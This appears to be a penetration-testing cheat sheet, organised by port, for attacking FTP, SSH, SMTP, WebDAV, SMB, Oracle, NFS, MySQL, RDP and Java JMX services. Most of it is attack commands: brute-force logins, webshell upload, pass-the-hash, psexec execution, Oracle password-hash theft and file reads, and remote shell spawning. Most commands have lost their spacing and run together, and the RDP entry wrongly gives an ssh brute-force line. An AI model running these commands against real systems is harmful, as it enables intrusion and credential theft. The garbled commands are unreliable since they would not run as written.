# Loginftp<ip># Anonymous login: after login use these creds [User:password]anonymous:anonymousanonymous:ftp:ftp# Anonymous login with nmapnmap--script=ftp-anon-p21<ip>nmap-sC-sV-p21<ip># [better] ftp-anon is a default script# Brute force loginhydra-Lusers.txt-Ppasswords.txt<ip>ftp
Search exploit for vulnerable version
22 - SSH
# Login with passwordssh<username>@<ip># then type password# Login with private keyssh-iid_rsa<username>@<ip># If private_key has passphrase you need to type it# Crack passphrasepythonssh2john.pyid_rsa>id_rsa.hashjohnid_rsa.hash-wordlist=<wordlist># Brute force loginhydra-Lusers.txt-Ppasswords.txt<ip>ssh
If login with private key fails and you're asked for your user password, check for some errors (-vv option). Make sure that the public key is added in the authorized_keys file.
25 - SMTP
Search exploit for vulnerable version
Retrieve the hostname of the server (domain name)
francesco@debian:~$nc<ip><port>220openmailbox.xyzESMTPPostfix:Welcome.# Here (in the banner)helowhatyouwant# helo command250openmailbox.xyz# Here
Username Bruteforce
Automation:
smtp-user-enum-U<wordlist>-t<ip>
Manual
francesco@debian:~$nc<ip><port>220openmailbox.xyzESMTPPostfix:Welcome.VRFYroot2522.0.0root# Output if user existsVRFYidontexists5505.1.1<idontexists>:Recipientaddressrejected:Userunknowninlocalrecipienttable
Note: there are other command you can use such as RCPT TO
80 - WebDav
With WebDav you can upload file. Normally it's necessary credentials
# 1 tool - davtest# Check what file type is executeddavtest-auth<user>:<password>-urlhttp://<ip>/<webdav_path># Upload filedavtest --url http://<ip>/<webdav_path> -auth <user>:<password> -uploadfile webshell.asp -uploadloc /destination/webshell.asp
# 2 tool - cadavercadaverhttp://<ip>/<webdav_path># then login.# Use PUT command to upload file
139/445 - SMB | Samba
# List shared folderssmbclient--no-pass-L//<ip># Null usersmbclient-U'admin%pwd'-L//<ip># (1) With credentialsmbclient-U'admin'-L//<ip># (2) With credential [pwd omitted, then type it]smbclient-U'admin'--pw-nt-hash<hash>-L//<ip># With hash (pass the hash)# Obtain information (you can also enumerate users)enum4linux-a [-u "<username>"-p"<passwd>"]<ip># Command execution (authenticated)smbmap-H<ip>-u<user>-p<pass>-x'ipconfig'python3psexec.pyAdministrator@ip# Even exploit/windows/smb/psexec metasploit module
Brute force login
Search exploit for vulnerable version
If v1 is enabled - EternalBlue exploit (check with nmap -> smb-protocols)
1521 - ORACLE DB (TNS protocol)
INTRODUCTION
Oracle clients communicate with the database using the TNS protocol
In Oracle DB a SID is specific to a database, it is unique in an environment and 'points' to one, and only one, database in an environment. A service name can be associated with one or more SIDs.
In a RAC environment where each instance is uniquely named yet all can be accessed through the SERVICE_NAME. [Oracle Real Application Cluster (RAC) is a "share-everything" database architecture in which two or more Oracle RAC nodes are clustered together and share the same memory]
SID SERVICE_NAME
test1 test
test2 test
All of those SIDs can be associated with the SERVICE_NAME test, and if load balancing is configured, the listener will 'balance' the workload across all SIDs. However, if you want, you can connect to test1, you just need to NOT use the SERVICE_NAME and use the SID.
# Oracle DB versionodattnscmd-s<ip>--version# Search valid SIDs (with default wordlist and bruteforce [default max-size 2 chars])odatsidguesser-s<ip># Search valid SIDs with custom sids wordlistodatsidguesser-s<ip>--sids-filesids.txt# Search valid SNs (with default wordlist and bruteforce [default max-size 2 chars])odatsnguesser-s<ip># Search valid SNs with custom SNs wordlistodatsnguesser-s<ip>--service-name-filesn.txt
Find user credentials
[CVE-2012-3137] You need a valid SID and Oracle DB version is one of this (10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3) you can obtain the session key and salt for arbitrary users.
[Guess password] You need SID or SN
# Guess password with SID/SN using default odat credentialsodatpasswordguesser-s<ip>-d<SID>odatpasswordguesser-s<ip>-n<SN>
Analyze database
# enumerate databaseodatsearch-s<ip>-d<SID>-p<port>-U<username>-P<password>--basic-info# open sql shellodatsearch-s<ip>-d<SID>-p<port>-U<username>-P<password>--sql-shell# get hashed password when the account is not lockedodatpasswordstealer-s<IP>-d<SID>-p<port>-Umobius-P<password>--get-passwords-not-locked# read file (ex. ssh private key)odatexternaltable-s<IP>-d<SID>-p<port>-Umobius-P<password>--getFile/etcpasswdpasswd# create file with cve-2018-3004 (ex. upload authorized key)odatcve-s<IP>-d<SID>-p<port>-Umobius-P<password>--cve-2018-3004/tmp/test"test"# NOTE: there are many other things and techniques you can use with odat. Refer to the documentation
2049 - NFS
# Folder available to mountshowmount-e<ip># Mountmount-tnfs<ip>:/test/mnt/folder# Umountumount/mnt/folder# If you can't read/write inside the folder, you can create/modify uid of a user### ls -lna /mnt/folder### drwxrwxr-x 6 777 1 4096 Jan 7 2018 QWERTY# 1 methoduseraddnewuserusermod-u6newuser## 2 methodnano/etc/passwd# edit uid# Note if it doesn't work, umount, edit uid, mount again
3306 - MYSQL
# Local without passmysql-uroot# Local with passmysql-uroot-p# Remote without passmysql-h<hostname>-uroot# Remote with passmysql-h<hostname>-uroot-p
Brute force login
Try with root default user
3389 - RDP
# Login xfreerdp/v:<ip>/u:<username>/p:<password># Brute force loginhydra-Lusers.txt-Ppasswords.txt<ip>ssh
Search exploit for vulnerable version
Tip: If you are not sure that specific port runs rdp you can check with auxiliary/scanner/rdp/rdp_scanner or try to connect with xfreerdp
5985,5986 - WinRM
Brute force login
Java RMI
# Tool: https://github.com/qtc-de/remote-method-guesserrmgenum<ip><port># Note: there are many other things and techniques you can use with rmg. Refer to the documentation
JMXRMI
# Find JMX port nmap-sC-sV-p45000<ip>[...]PORTSTATESERVICEVERSION45000/tcpopenjava-rmiJavaRMI|rmi-dumpregistry:|jmxrmi[...]
TESTING
# Tool: https://github.com/qtc-de/beanshooter# jconsole (/usr/lib/jvm/java-xxxxxx-openjdk-amd64/bin/jconsole)# (Some jdk doesn't include jconsole)# Check credentialsjconsole# connect <hostname>:<port>. [without credentials]# Enumerate configurationbeanshooterenum<ip><jmx_port># The best way to get a shell is with tonka # Creating a TemplateImpl payload object to abuse StandardMBeanbeanshooterstandard<ip><jmx_port>tonka# Spawns a shell. NOTE: this works even if the target host doesn't reach youbeanshootertonkashell<ip><jmx_port># Note: there are many other things and techniques you can use with beanshooter. Refer to the documentation
Beanshooter Tips
If your local Java version is higher than the Java version of the application server, the server cannot load the bytecode and throws an exception.
How to know what java version the server is running? Connect with jconsole, then go to "VM Summary", find "VM Arguments" and search "Boot class path".
Install with maven
My installation method (sdkman)
# https://sdkman.io/install# 1 - Install sdkmancurl-s"https://get.sdkman.io"|bashsource"$HOME/.sdkman/bin/sdkman-init.sh"sdkversion# 2 - Install jdk (ex. java 8) [choose based on the taget]sdkinstalljava8.0.275.hs-adpt# 3 - Install mavensdkinstallmaven# 4 - Check installationmvn-vApacheMaven3.9.8Javaversion:1.8.0_275,vendor:AdoptOpenJDK,runtime:/home/kali/.sdkman/candidates/java/8.0.275.hs-adpt/jre# 5 - Now you can install beanshooter
Other ports
Most of the services identified by the Nmap scan are easily recognizable, however, it's possibile that there are a few open ports on a target system that do not have a service banner. To learn more about these port and the service running, we can perform banner grabbing with Netcat
